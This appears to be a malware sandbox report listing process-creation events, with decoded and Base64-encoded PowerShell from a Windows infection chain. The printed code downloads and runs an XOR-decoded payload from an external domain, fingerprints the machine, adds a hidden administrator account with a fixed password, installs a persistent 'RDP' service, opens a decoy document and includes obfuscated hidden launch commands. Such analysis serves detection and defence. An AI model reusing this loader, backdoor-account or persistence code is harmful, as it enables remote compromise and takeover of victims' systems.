        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f876791";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES352B.tmp" "c:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "s^t^ar^t /m^i^n "" p^ower^s^h^el^l -w h^idde^n -no^l^ogo -n^o^p -ep b^ypa^ss -en^c^ode^d^comman^d "sqbfafgaiaaoafsavabfafgadaauaeuabgbdag8azabpae4arwbdadoaogbvafqarga4ac4arwblahqauwb0afiaaqbuagcakaaoagkadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawahqaugaiackakqapackalgbdag8atgbuaguatgb0ackakqa="" && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfafgadaauaeuabgbdag8azabpae4arwbdadoaogbvafqarga4ac4arwblahqauwb0afiaaqbuagcakaaoagkadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawahqaugaiackakqapackalgbdag8atgbuaguatgb0ackakqa="
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8amabmagqayqbhadaamwa4ageazaa2agmamgblaguayqa0aduamqawadiazqa3agmayqa5agyayqa0adeanga3adganqa4aguazgbladkazaa3adkaoqa1agyamabjagyanaayagyamqbkageaoaawadkamaa0adaamgbjaguazgbjadianqa1adqazabkagqayqbjagqamaayageaygbjadcazga5adeazabhadyanwa1adeaywbjagmazqa5adaazabkadqaoaa4adcaygaxadeanga0aduanqbladqaoqbiaguaoaaxagqaygaxadaazga4adaaygbhageamqaxageanaayadqazgawadaanqbkadyazabiagqayqbkadcanqa0adganwa2agqanqa5aguanqbmadqangawagiamqbjadqazgbmagiayqa5agmazabkadeayqa0agmamwa5adcamaa1aduayqawadiaoabladaamga2adiamqbladyazaa0agmazqaxadqanabladaazgbladgamqa4agianwawaguangayadeaywa5agyanabmadganwa2adcaoqaxaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabw